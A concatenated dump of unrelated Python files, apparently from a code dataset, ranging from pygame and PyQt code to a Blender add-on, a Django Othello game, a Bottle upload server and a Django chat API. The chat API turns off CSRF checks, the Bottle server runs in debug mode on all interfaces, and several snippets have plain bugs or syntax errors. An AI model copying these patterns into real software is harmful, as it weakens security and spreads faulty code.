bitrate: int = Schema (None,
title = "Bitrate of the Requested Video",
gt = 0,
description = "The bitrate must be in [500, 8000]")
""" bitrate of the Requested Video. Must be in range [500, 8000]
"""
speed: str = Schema (None,
title = "Encoding Speed",
description = "It can be ultrafast or fast")
""" encoding speed. Can be "ultrafast" or "fast"
"""
class State:
""" Possible states for a Job.
"""
WAITING = "Waiting"
STARTED = "Started"
COMPLETED = "Completed"
ERROR = "Error"
|
24,672 | 31c92656f935433e4bdcf9b470f43e4f07b4348c | import pygame as pg
from random import choice, randrange
from settings import *
from game import *
class Player(GameSprite):
def __init__(self, game):
GameSprite.__init__(self, game, [game.all_sprites], layer=PLAYER_LAYER)
self.walking = False
self.jumping = False
self.current_frame = 0
self.last_update = 0
self.load_images()
self.image = self.standing_frames[0]
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.center = (40, HEIGHT - 100)
self.pos = vec(40, HEIGHT - 100)
self.acc = vec(0, PLAYER_GRAV)
self.friction = vec(PLAYER_FRICTION, 0)
self.static = False
def load_images(self):
self.standing_frames =[self.game.spritesheet.get_image(614, 1063, 120, 191),
self.game.spritesheet.get_image(690, 406, 120, 201)]
for frame in self.standing_frames:
frame.set_colorkey(BLACK)
self.walk_frames_r = [self.game.spritesheet.get_image(678, 860, 120, 201),
self.game.spritesheet.get_image(692, 1458, 120, 207)]
for frame in self.walk_frames_r:
frame.set_colorkey(BLACK)
self.walk_frames_l = []
for frame in self.walk_frames_r:
self.walk_frames_l.append(pg.transform.flip(frame, True, False))
for frame in self.walk_frames_l:
frame.set_colorkey(BLACK)
self.jump_frame = self.game.spritesheet.get_image(382, 763, 150, 181)
self.jump_frame.set_colorkey(BLACK)
def jump_cut(self):
if self.jumping:
if self.vel.y < -3:
self.vel.y = -3
def jump(self):
self.rect.y += 2
hits = pg.sprite.spritecollide(self, self.game.platforms, False)
self.rect.y -= 2
if hits and not self.jumping:
print("play sound")
self.game.jump_sound.play()
self.jumping = True
self.vel.y = -PLAYER_JUMP_VEL
def nothing_below(self):
self.rect.y += 2
hits = pg.sprite.spritecollide(self, self.game.platforms, False)
self.rect.y -= 2
return len(hits)==0
def update_sprite(self):
self.animate()
self.acc = vec(0, PLAYER_GRAV)
keys = pg.key.get_pressed()
if keys[pg.K_LEFT]:
self.acc.x = -PLAYER_ACC
if keys[pg.K_RIGHT]:
self.acc.x = PLAYER_ACC
def update_position(self):
self.rect.midbottom = self.pos
def animate(self):
now = pg.time.get_ticks()
if self.vel.x != 0:
self.walking = True
else:
self.walking = False
if self.walking:
if now - self.last_update > 200:
self.last_update = now
self.current_frame = (self.current_frame+1) % len(self.walk_frames_l)
bottom = self.rect.bottom
if self.vel.x > 0:
self.image = self.walk_frames_r[self.current_frame]
else:
self.image = self.walk_frames_l[self.current_frame]
self.rect = self.image.get_rect()
self.rect.bottom = bottom
if not self.jumping and not self.walking:
if now - self.last_update > 350:
self.last_update = now
self.current_frame = (self.current_frame+1) % len(self.standing_frames)
bottom = self.rect.bottom
self.image = self.standing_frames[self.current_frame]
self.rect = self.image.get_rect()
self.rect.bottom = bottom
self.mask = pg.mask.from_surface(self.image)
class Platform(GameSprite):
def __init__(self, game, x, y):
GameSprite.__init__(self, game, [game.all_sprites, game.platforms], PLATFORM_LAYER)
self.images = [self.game.spritesheet.get_image(0, 288, 380, 94),
self.game.spritesheet.get_image(213, 1662, 201, 100)]
self.image = choice(self.images)
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
if randrange(100) < POW_SPAWN_PCT:
Pow(self.game, self)
class Pow(GameSprite):
def __init__(self, game, plat):
GameSprite.__init__(self, game, [game.all_sprites, game.powerups], POW_LAYER)
self.plat = plat
self.type = choice(['boost'])
self.image = self.game.spritesheet.get_image(820,1805,71,70)
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = self.plat.rect.centerx
self.rect.bottom = self.plat.rect.top - 5
def update(self):
self.rect.bottom = self.plat.rect.top - 5
if not self.game.platforms.has(self.plat):
self.kill()
class Mob(GameSprite):
def __init__(self, game):
GameSprite.__init__(self, game, [game.all_sprites, game.mobs], MOB_LAYER)
self.image_up = self.game.spritesheet.get_image(566, 510, 122, 139)
self.image_up.set_colorkey(BLACK)
self.image_down = self.game.spritesheet.get_image(568, 1534, 122, 135)
self.image_down.set_colorkey(BLACK)
self.image = self.image_up
self.rect = self.image.get_rect()
self.rect.centerx = choice([-100, WIDTH + 100])
self.vx = randrange(1, 4)
if self.rect.centerx > WIDTH:
self.vx *= -1
self.rect.y = randrange(HEIGHT / 2)
self.vy = 0
self.dy = 0.5
def update(self):
self.rect.x += self.vx
self.vy += self.dy
if self.vy>3 or self.vy <-3 :
self.dy *= -1
center = self.rect.center
if self.dy < 0:
self.image = self.image_up
else:
self.image = self.image_down
self.rect = self.image.get_rect()
self.rect.center = center
self.rect.y += self.vy
self.mask = pg.mask.from_surface(self.image)
if self.rect.left > WIDTH + 100 or self.rect.right < -100:
self.kill()
class Cloud(GameSprite):
def __init__(self, game):
GameSprite.__init__(self, game, [game.all_sprites, game.clouds], CLOUD_LAYER)
self.image = choice(self.game.cloud_images)
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
scale = randrange(50,101) / 100
pg.transform.scale(self.image, (int(self.rect.width * scale), int(self.rect.height * scale)))
self.rect.x = randrange(WIDTH - self.rect.width)
self.rect.y = randrange(-500, -50)
self.vx = choice([-2,-1, 1, 2])
def update(self):
self.rect.x += self.vx
# wrap around the sides of the screen
if self.rect.left >= WIDTH:
self.rect.right = 0
elif self.rect.right <= 0:
self.rect.left = WIDTH
if self.rect.top > HEIGHT * 2:
self.kill()
|
24,673 | 79530d34cd246758e9c74e8a3b804c1363182954 | def nfsmsim(string, current, edges, accepting):
if string =="":
return current in accepting
else:
letter = string[0:1]
if (current, letter) in edges:
remainder = string[1:]
newstates = edges[(current, letter)]
for newstate in newstates:
if nfsmsim(remainder, newstate, edges, accepting):
return True
return False |
24,674 | 8b2059b12fc0a6dc86060df6c3c02f08451270fc | import board
import busio
import time
import RPi.GPIO as GPIO
from digitalio import Direction, Pull
from adafruit_mcp230xx.mcp23017 import MCP23017
i2c = busio.I2C(board.SCL, board.SDA)
mcp = MCP23017(i2c)
pinR = mcp.get_pin(7)
pinG = mcp.get_pin(6)
pinB = mcp.get_pin(5)
pinL = [pinR, pinG, pinB]
for pin in pinL:
pin.direction = Direction.OUTPUT
pin.switch_to_output(value=True)
pin.value=False
def blink_cycle():
def stateGenerator(period):
s1 = 0
s2 = 0
s3 = 0
while True:
if s1 is 0:
s1 = 1
else:
s1 = 0
if s2 is 0:
s2 = 1
else:
s2 = 0
if s3 is 0:
s3 = 1
else:
s3 = 0
time.sleep(period)
yield [s3, s2, s1]
return
try:
for state in stateGenerator(.5):
pinR.value = (state[0] is 1)
pinB.value = (state[1] is 1)
pinG.value = (state[2] is 1)
finally:
pinR.value = False
pinB.value = False
pinG.value = False
if __name__ == "__main__":
blink_cycle() |
24,675 | 87579223a7c9fd4602bc4f6c3bf3d316149056e0 | import plotly.colors
def get_continuous_color(colorscale, intermed):
"""
Author Frederic Abraham took it from stack overflow for the visualization
Src = https://stackoverflow.com/questions/62710057/access-color-from-plotly-color-scale
Plotly continuous colorscales assign colors to the range [0, 1]. This function computes the intermediate
color for any value in that range.
Plotly doesn't make the colorscales directly accessible in a common format.
Some are ready to use:
colorscale = plotly.colors.PLOTLY_SCALES["Greens"]
Others are just swatches that need to be constructed into a colorscale:
viridis_colors, scale = plotly.colors.convert_colors_to_same_type(plotly.colors.sequential.Viridis)
colorscale = plotly.colors.make_colorscale(viridis_colors, scale=scale)
:param colorscale: A plotly continuous colorscale defined with RGB string colors.
:param intermed: value in the range [0, 1]
:return: color in rgb string format
:rtype: str
"""
if len(colorscale) < 1:
raise ValueError("colorscale must have at least one color")
if intermed <= 0 or len(colorscale) == 1:
return colorscale[0][1]
if intermed >= 1:
return colorscale[-1][1]
for cutoff, color in colorscale:
if intermed > cutoff:
low_cutoff, low_color = cutoff, color
else:
high_cutoff, high_color = cutoff, color
break
# noinspection PyUnboundLocalVariable
return plotly.colors.find_intermediate_color(
lowcolor=low_color, highcolor=high_color,
intermed=((intermed - low_cutoff) / (high_cutoff - low_cutoff)),
colortype="rgb") |
24,676 | 09255fb803a9820578df23a1092b2d3bef92b443 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import _thread
import time
from django.shortcuts import render
from django.utils.crypto import get_random_string
from django.http import JsonResponse
tokenList = []
a = [1, -1, 0, 0]
b = [0, 0, 1, -1]
status = {}
game = {}
scores = {}
playing = {}
timer = {}
cnt = 0
dr = [
0,
-1,
-1,
-1,
0,
1,
1,
1,
]
dc = [
-1,
-1,
0,
1,
1,
1,
0,
-1,
]
def Timer(token):
while(True):
timer[token]-=1
time.sleep(1)
def home(request):
return render(request, 'userInput.html')
def getToken(request):
return JsonResponse({'list':tokenList})
def passChance(request):
token = request.GET['token']
player = request.GET['player']
if player == '1':
status[token] = 5
else:
status[token] = 4
return JsonResponse({'token':token})
def scoreUpdate(token):
scores[token] = 0
global cnt
cnt = 0
for i in range(0,8):
for j in range(0,8):
if game[token][i*8+j] == '0':
scores[token]+=1
if game[token][i*8+j] == '1':
cnt+=1
def request(request):
token = request.GET['token']
chance = request.GET['player']
print(tokenList)
scoreUpdate(token)
global cnt
if status[token] == 6 or status[token] == 7:
playing[token]-=1
tokenList.remove(token)
if playing[token] == 0:
tokenList.remove(x)
if (scores[token]+cnt) == 64:
if chance == '1':
if scores[token] > cnt:
status[token] = 6
else:
status[token] = 7
else:
if scores[token] > cnt:
status[token] = 7
else:
status[token] = 6
if status[token]==2:
status[token] = 4
timer[token] = 60
if scores[token]==0 or timer[token] <= 0 or cnt==0 or status[token] >= 6:
if status[token] == 4:
status[token] = 7
elif status[token] == 5:
status[token] = 6
#tokenList.remove(token)
if status[token] == 4:
return JsonResponse({'token':token,'table':game[token],'player':chance,'score1':scores[token],'score2':cnt,'status':status[token],'timer1':timer[token],'timer2':'60'})
elif status[token] == 5:
return JsonResponse({'token':token,'table':game[token],'player':chance,'score1':scores[token],'score2':cnt,'status':status[token],'timer1':'60','timer2':timer[token]})
else:
return JsonResponse({'token':token,'table':game[token],'player':chance,'score1':scores[token],'score2':cnt,'status':status[token],'timer1':'60','timer2':'60'})
def newGame(request):
unique_id = get_random_string(length=5)
tokenList.append(unique_id)
board = ""
for i in range(0,8):
for j in range(0,8):
if (i==j) and (i==3 or j == 4):
board += '0'
elif (i==3 and j==4) or (i==4 and j==3):
board += '1'
else:
board += '2'
game[unique_id] = board
id = '1'
token = unique_id
player = '1'
playing[token] = 1
status[token] = 1
timer[token] = 60
return render(request, 'newGame.html', {'token': unique_id,'table':board,'player':"1"})
def verify(request, token):
if str(token) in tokenList:
if playing[token] == 2:
return render(request, 'userInput.html')
status[token] = 2
playing[token] = 2
timer[token] = 60
_thread.start_new_thread(Timer,(token,))
return render(request, 'newGame.html', {'token': token,'table':game[token],'player':"2"})
else:
return render(request, 'userInput.html')
def update(request):
global chance
row = int(request.GET['row'])
col = int(request.GET['col'])
token = request.GET['token']
player = request.GET['player']
table = list(game[token])
flip = int(player) - 1
table[row * 8 + col] = flip
timer[token] = 60
for i in range(0, 8):
x = dr[i]
y = dc[i]
l = row+x
r = col+y
cnt = 0
while(l>=0 and l<8 and r>=0 and r<8):
#print(table[l*8+r])
if table[l*8+r] == '2':
break
if table[l*8+r] == str(flip):
break
cnt+=1
l+=x
r+=y
if cnt >= 1 and l>=0 and l<8 and r>=0 and r < 8 and table[l*8+r] == str(flip):
l = row+x
r = col+y
while(l>=0 and l<8 and r>=0 and r<8):
if table[l*8+r] == '2':
break
if table[l*8+r] == str(flip):
break
table[l*8+r] = str(flip)
l+=x
r+=y
game[token] ="".join([str(i) for i in table])
status[token]^=1
scoreUpdate(token)
global cnt
if scores[token] == 0 or timer[token] == 0:
status[token]+=2
if cnt == 0:
status[token] +=2
if player == '1':
return JsonResponse({'table': "".join([str(i) for i in table]), 'player': player,'timer1':timer[token],'timer2':'60','score1':scores[token],'score2':cnt,'status':status[token]})
else:
return JsonResponse({'table': "".join([str(i) for i in table]), 'player': player,'timer1':'60','timer2':timer[token],'score1':cnt,'score2':scores[token],'status':status[token]})
|
24,677 | da82e51f723481f37110ba331c00e39448fdc849 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'UiMessageBrowserWindow.ui'
#
# Created by: PyQt5 UI code generator 5.8.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MessageBrowserWindow(object):
def setupUi(self, MessageBrowserWindow):
MessageBrowserWindow.setObjectName("MessageBrowserWindow")
MessageBrowserWindow.resize(320, 480)
MessageBrowserWindow.setMinimumSize(QtCore.QSize(320, 0))
self.centralwidget = QtWidgets.QWidget(MessageBrowserWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setContentsMargins(1, 1, 1, 1)
self.gridLayout.setObjectName("gridLayout")
self.filter_config_file_line_edit = QtWidgets.QLineEdit(self.centralwidget)
self.filter_config_file_line_edit.setReadOnly(True)
self.filter_config_file_line_edit.setObjectName("filter_config_file_line_edit")
self.gridLayout.addWidget(self.filter_config_file_line_edit, 0, 1, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.message_browser_plain_text_edit = QtWidgets.QPlainTextEdit(self.centralwidget)
self.message_browser_plain_text_edit.setMinimumSize(QtCore.QSize(300, 0))
font = QtGui.QFont()
font.setFamily("Consolas")
self.message_browser_plain_text_edit.setFont(font)
self.message_browser_plain_text_edit.setLineWrapMode(QtWidgets.QPlainTextEdit.NoWrap)
self.message_browser_plain_text_edit.setReadOnly(True)
self.message_browser_plain_text_edit.setObjectName("message_browser_plain_text_edit")
self.gridLayout.addWidget(self.message_browser_plain_text_edit, 1, 0, 1, 2)
MessageBrowserWindow.setCentralWidget(self.centralwidget)
self.toolBar = QtWidgets.QToolBar(MessageBrowserWindow)
self.toolBar.setMovable(False)
self.toolBar.setObjectName("toolBar")
MessageBrowserWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.actionOpenFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/ico/ico/LogFilter.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionOpenFilterConfigFile.setIcon(icon)
self.actionOpenFilterConfigFile.setObjectName("actionOpenFilterConfigFile")
self.actionSaveFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/ico/ico/Save.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSaveFilterConfigFile.setIcon(icon1)
self.actionSaveFilterConfigFile.setObjectName("actionSaveFilterConfigFile")
self.actionSaveAsFilterConfigFile = QtWidgets.QAction(MessageBrowserWindow)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/ico/ico/SaveAs.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSaveAsFilterConfigFile.setIcon(icon2)
self.actionSaveAsFilterConfigFile.setObjectName("actionSaveAsFilterConfigFile")
self.actionStartToWatch = QtWidgets.QAction(MessageBrowserWindow)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/ico/ico/Start.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionStartToWatch.setIcon(icon3)
self.actionStartToWatch.setObjectName("actionStartToWatch")
self.actionStopToWatch = QtWidgets.QAction(MessageBrowserWindow)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/ico/ico/Stop.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionStopToWatch.setIcon(icon4)
self.actionStopToWatch.setObjectName("actionStopToWatch")
self.actionClearAllMessages = QtWidgets.QAction(MessageBrowserWindow)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/ico/ico/LogClear.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionClearAllMessages.setIcon(icon5)
self.actionClearAllMessages.setObjectName("actionClearAllMessages")
self.toolBar.addAction(self.actionOpenFilterConfigFile)
self.toolBar.addAction(self.actionSaveFilterConfigFile)
self.toolBar.addAction(self.actionSaveAsFilterConfigFile)
self.toolBar.addSeparator()
self.toolBar.addAction(self.actionStartToWatch)
self.toolBar.addAction(self.actionStopToWatch)
self.toolBar.addSeparator()
self.toolBar.addAction(self.actionClearAllMessages)
self.retranslateUi(MessageBrowserWindow)
QtCore.QMetaObject.connectSlotsByName(MessageBrowserWindow)
def retranslateUi(self, MessageBrowserWindow):
_translate = QtCore.QCoreApplication.translate
MessageBrowserWindow.setWindowTitle(_translate("MessageBrowserWindow", "MainWindow"))
self.label.setText(_translate("MessageBrowserWindow", "Config:"))
self.toolBar.setWindowTitle(_translate("MessageBrowserWindow", "toolBar"))
self.actionOpenFilterConfigFile.setText(_translate("MessageBrowserWindow", "Open Filter Config File"))
self.actionSaveFilterConfigFile.setText(_translate("MessageBrowserWindow", "Save Filter Config File"))
self.actionSaveAsFilterConfigFile.setText(_translate("MessageBrowserWindow", "Save As Filter Config File"))
self.actionStartToWatch.setText(_translate("MessageBrowserWindow", "Start To Watch"))
self.actionStopToWatch.setText(_translate("MessageBrowserWindow", "Stop To Watch"))
self.actionClearAllMessages.setText(_translate("MessageBrowserWindow", "Clear All"))
import UiResource_rc
|
24,678 | d2306e246384bde51db362953c74e46e6b71b882 |
class Enemy(object):
def__init__(self,name,hp,damage):
self.name = name
self.hp = hp
self.damage= damage
def is_alive(self):
return self.hp > 0
class GiantSpider(Enemy):
def __init__(self):
super().__init__(name="Giant Spider",hp =10, damage =2)
class Ogre(Enemy):
def __init__(self):
super().__init__(name="Ogre",hp=30,damage=15)
|
24,679 | 24d216d5cc472408677932220cdd921a0110d44c | # -*- coding: utf-8 -*-
import os, wave, time
from bottle import route, run, request, static_file, view
upload_dir = 'upload_dir/'
@route('/', method='GET')
@view('files')
def file_list():
files_info = []
if os.path.exists(upload_dir):
files = os.listdir(upload_dir)
files.sort(reverse=True)
files_info = [{
"url": 'files/' + filename,
"name": filename,
"time": int(os.path.getmtime(os.path.join(upload_dir, filename)))
} for filename in files if os.path.splitext(filename)[1] == '.wav']
return dict(files=files_info)
@route('/wave', method='POST')
def do_upload():
wav_file = request.files.get('file')
name, ext = os.path.splitext(wav_file.filename)
# Listnr uploads audio data as “sample.r16”
if ext not in ('.r16'):
return 'File extension not allowed.'
if not os.path.exists(upload_dir):
os.mkdir(upload_dir)
file_name = str(int(time.time())) + '.wav'
file_path = os.path.join(upload_dir, file_name)
write_wave(file_path, wav_file.file.read())
return 'OK'
@route('/files/<filename:re:.+\.wav>')
def wav_files(filename):
return static_file(filename, root=upload_dir)
@route('/img/<filename:re:.+\.png>')
def img_files(filename):
return static_file(filename, root='img/')
@route('/css/<filename:re:.+\.css>')
def css_files(filename):
return static_file(filename, root='css/')
@route('/js/<filename:re:.+\.js>')
def js_files(filename):
return static_file(filename, root='js/')
def write_wave(file_path, wave_bin):
wave_file = wave.open(file_path, 'wb')
# Mono, 16bit, 16kHz
wave_file.setparams((1, 2, 16000, 0, 'NONE', 'not compressed'))
wave_file.writeframes(wave_bin)
wave_file.close()
run(host='0.0.0.0', port=8080, debug=True, reloader=True)
|
24,680 | 58fca15da7aaf881f9a9a2fe7ce24c3ce5694d11 | #
# Solution to Project Euler problem 7
#
# Author: Xiaochen Li
# Date: May 21, 2019
#
#
# Problem: What is the 10 001st prime number?
#
#
|
24,681 | cc858eb21d62737b9cfd12c1e08a5b134ccc1d6d | # 문제 : 자동차 객체를 담을 변수를 만들어주세요.
# 자동차 객체를 변수에 담고 그 변수를 이용해 최고속력이 서로 다르게 만들어주세요.
# 각 자동차가 자신의 최고속력으로 달리게 해주세요.
# 출력 : 자동차가 최대속력 220km로 달립니다.
# 출력 : 자동차가 최대속력 250km로 달립니다.
class Car :
maxVelo = 0
def drive(self) :
print("자동차가 최대속력 {}km로 달립니다.".format(self.maxVelo))
c1 = Car()
c2 = Car()
c1.maxVelo = 220
c2.maxVelo = 250
c1.drive()
c2.drive()
|
24,682 | c200d31129681b8a95ceb8215a8603a75b9e34f4 |
# planetary constants
from . import earth
from .constants import * |
24,683 | 6e157fd3a5ec5c9e4817660cefbc4b202af61cad | """
Copyright (C) 2015 Patrick Moore
patrick.moore.bu@gmail.com
Created by Patrick Moore
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
bl_info = {
"name": "Cut Mesh",
"description": "Tools for cutting and trimming mesh objects",
"author": "Patrick Moore",
"version": (0, 0, 1),
"blender": (2, 81, 0),
"location": "View 3D > Tool Shelf",
"warning": "", # used for warning icon and text in addons panel
"wiki_url": "", # TODO update for b280 branch
"tracker_url": "", # TODO update for 280 branch
"category": "3D View",
}
# Blender imports
import bpy
from bpy.types import Operator, AddonPreferences
from bpy.props import (
StringProperty,
IntProperty,
BoolProperty,
EnumProperty,
FloatProperty,
FloatVectorProperty,
)
# TODO Preferences
# TODO Menu
# Tools
from .op_polytrim.polytrim import CutMesh_Polytrim
# addon preferences
class CutMeshPreferences(AddonPreferences):
bl_idname = __name__
# Segmentation Editor Behavior
spline_preview_tess: IntProperty(
name="Spline Teseslation", default=20, min=3, max=100
)
sketch_fit_epsilon: FloatProperty(
name="Sketch Epsilon", default=0.25, min=0.001, max=10
)
patch_boundary_fit_epsilon: FloatProperty(
name="Boundary Epsilon", default=0.35, min=0.001, max=10
)
spline_tessellation_epsilon: FloatProperty(
name="Spline Epsilon", default=0.1, min=0.001, max=10
)
destructive: EnumProperty(
name="Geometry Mode",
items=[
("DESTRUCTIVE", "DESTRUCTIVE", "DESTRUCTIVE"),
("NON_DESTRUCTIVE", "NON_DESTRUCTIVE", "NON_DESTRUCTIVE"),
],
default="DESTRUCTIVE",
)
# 2D Interaction Behavior
non_man_snap_pxl_rad: IntProperty(
name="Snap Radius Pixel", default=20, min=5, max=150
)
sel_pxl_rad: IntProperty(name="Select Radius Pixel", default=10, min=3, max=100)
loop_close_pxl_rad = IntProperty(
name="Select Radius Pixel", default=10, min=3, max=100
)
# Menu Colors
menu_bg_color: FloatVectorProperty(
name="Mennu Backgrounng Color",
description="FLoating Menu color",
min=0,
max=1,
default=(0.3, 0.3, 0.3),
subtype="COLOR",
)
menu_border_color: FloatVectorProperty(
name="Menu Border Color",
description="FLoating menu border colro",
min=0,
max=1,
default=(0.1, 0.1, 0.1),
subtype="COLOR",
)
deact_button_color: FloatVectorProperty(
name="Button Color",
description="Deactivated button color",
min=0,
max=1,
default=(0.5, 0.5, 0.5),
subtype="COLOR",
)
act_button_color: FloatVectorProperty(
name="Active Button Color",
description="Activated button color",
min=0,
max=1,
default=(0.2, 0.2, 1),
subtype="COLOR",
)
# Geometry Colors
act_point_color: FloatVectorProperty(
name="Active Point Color",
description="Selected/Active point color",
min=0,
max=1,
default=(0.2, 0.7, 0.2),
subtype="COLOR",
)
act_patch_color: FloatVectorProperty(
name="Active Patch Color",
description="Selected/Active patch color",
min=0,
max=1,
default=(0.2, 0.7, 0.2),
subtype="COLOR",
)
spline_default_color: FloatVectorProperty(
name="Spline Color",
description="Spline color",
min=0,
max=1,
default=(0.2, 0.2, 0.7),
subtype="COLOR",
)
hint_color: FloatVectorProperty(
name="Hint Color",
description="Hint Geometry color",
min=0,
max=1,
default=(0.5, 1, 0.5),
subtype="COLOR",
)
bad_segment_color: FloatVectorProperty(
name="Active Button Color",
description="Activated button color",
min=0,
max=1,
default=(1, 0.6, 0.2),
subtype="COLOR",
)
bad_segment_hint_color: FloatVectorProperty(
name="Bad Segment Hint",
description="Bad segment hint color",
min=0,
max=1,
default=(1, 0, 0),
subtype="COLOR",
)
def draw(self, context):
layout = self.layout
layout.label(text="Cut Mesh Preferences")
# layout.prop(self, "mat_lib")
## Visualization
row = layout.row(align=True)
row.label(text="Visualization Settings")
row = layout.row(align=True)
row.prop(self, "menu_bg_color")
row.prop(self, "menu_border_color")
row.prop(self, "deact_button_color")
row.prop(self, "act_button_color")
## Operator Defaults
# box = layout.box().column(align=False)
row = layout.row()
row.label(text="Operator Defaults")
# ...This properties do not exist yet so i comment code lines..............................................
# ##### Fit and Thickness ####
# row = layout.row()
# row.label(text="Thickness, Fit and Retention")
# row = layout.row()
# row.prop(self, "def_shell_thickness")
# row.prop(self, "def_passive_radius")
# row.prop(self, "def_blockout_radius")
def register():
bpy.utils.register_class(CutMeshPreferences) # TODO
# bpy.utils.register_class(CutMesh_panel) #TODO
# bpy.utils.register_class(CutMesh_menu) #TODO
bpy.utils.register_class(CutMesh_Polytrim)
def unregister():
bpy.utils.unregister_class(CutMeshPreferences) # TODO
# bpy.utils.register_class(CutMesh_panel) #TODO
# bpy.utils.register_class(CutMesh_menu) #TODO
bpy.utils.unregister_class(CutMesh_Polytrim)
# class polytrimPanel(bpy.types.Panel):
# bl_label = "Cut Mesh Tools"
# bl_idname = "cut_mesh_panel"
# bl_space_type = "VIEW_3D"
# bl_region_type = "UI"
# bl_category = "CutMesh"
# bl_context = ""
# def draw(self, context):
# layout = self.layout
# layout.label(text="Mesh Cut")
# row = layout.row()
# row.operator("cut_mesh.polytrim")
############################################################################################
# Registration :
############################################################################################
addon_modules = []
classes = [CutMesh_Polytrim, CutMeshPreferences]
# Registration :
def register():
for module in addon_modules:
module.register()
for cl in classes:
bpy.utils.register_class(cl)
def unregister():
for cl in classes:
bpy.utils.unregister_class(cl)
for module in reversed(addon_modules):
module.unregister()
if __name__ == "__main__":
register()
|
24,684 | cee984f15dac205423ed1f567a9d950169af6690 | from flask import Flask
import os
import Controller
import ControllerType
import Actuator
import AutomationConfig
class MissingController(Exception):
"""No controller specified"""
pass
class MissingId(Exception):
"""No controller specified"""
pass
def Config():
return AutomationConfig.Config()
def AddActuator(controller, config_dict):
return controller.CreateActuator(config_dict)
def AddController(controller_type, config_dict):
return controller_type.CreateController(config_dict)
def DeleteActuator(actuator_name):
actuator = Actuator.Find(actuator_name)
if actuator:
Actuator.Delete(actuator)
def DeleteController(controller_name):
Controller.Delete(controller_name)
def EditActuator(actuator, new_config_dict):
actuator.Edit(new_config_dict)
def EditController(controller, new_config_dict):
controller.Edit(new_config_dict)
def FindController(name):
return Controller.Find(name)
def FindActuator(name):
return Actuator.Find(name)
def NextOrder():
return Actuator.NextOrder()
def ToggleActuator(name):
actuator = Actuator.Find(name)
if actuator:
actuator.SetState(not actuator.State())
def OrderedActuators(category=None):
return Actuator.OrderedActuators(category)
def OrderedAliases(category=None):
return Actuator.OrderedAliases(category)
def OrderedControllers(category=None):
return Controller.OrderedControllers(category)
def FindControllerType(name):
return ControllerType.Find(name)
def GetControllerTypes():
return ControllerType.GetTypes()
def GetControllerNames():
return Controller.GetNames()
def ActuatorCategories():
return Actuator.ActuatorCategories()
def ControllerCategories():
return Controller.ControllerCategories()
if __name__ == '__main__':
AutomationConfig.Read()
print "===== Controller Types ====="
ControllerType.Dump()
print "===== Controllers ====="
Controller.DumpControllers()
print "===== Actuators ====="
Actuator.DumpActuators()
if False:
print "=== Config ==="
config = AutomationConfig.Config()
for section in config.sections():
print '[', section, ']'
for item in config.items(section):
print ' ', item[0], '=', item[1]
|
24,685 | f2aac9f92efb7275cc0847a00a4bd0921f187929 | def Test():
s=int(input())
two=bin(s)[2:]
new=int(("0"+two.replace("0","1")),2)
print(str(new-s)+" "+str(new))
if __name__ == "__main__":
total=int(input())
for i in range(0,total):
Test() |
24,686 | 759eaf1bdf72a442926d996adff430fd1511a9ff | #
# Lasciate ogni speranza, voi ch'entrate
#
from rest_framework import viewsets, status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import authentication
from rest_framework.pagination import CursorPagination
from rest_framework.authentication import SessionAuthentication
from django.contrib.auth.models import User
from cent import Client
import json, os, jwt
from ..settings import BASE_DIR
from .serializers import MessageSerializer, ChatSerializer, UserSerializer
from .models import Message, Chat
cf_file = open(os.path.join(BASE_DIR, 'config/centrifugo.json'))
cf = json.load(cf_file)
centrifuge = Client("http://centrifugo:8000", api_key=cf['api_key'])
cf_file.close()
def check_user_access(request, chatId):
if request.user.is_staff:
return True
chat = Chat.objects.get(id=chatId)
return chat.users.filter(id=request.user.id).exists()
class CsrfExemptSessionAuthentication(SessionAuthentication):
def enforce_csrf(self, request):
return
class CursorSetPagination(CursorPagination):
page_size = 200
page_size_query_param = 'count'
ordering = '-date' # '-creation' is default
#
# Admin methods
#
class CreateChatView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
serialier = ChatSerializer(data=request.data)
if serialier.is_valid():
chat = serialier.save(users=[request.user])
return Response(ChatSerializer(chat).data, status=status.HTTP_200_OK)
return Response(serialier.errors, status=status.HTTP_400_BAD_REQUEST)
class GetUsersView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def get(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
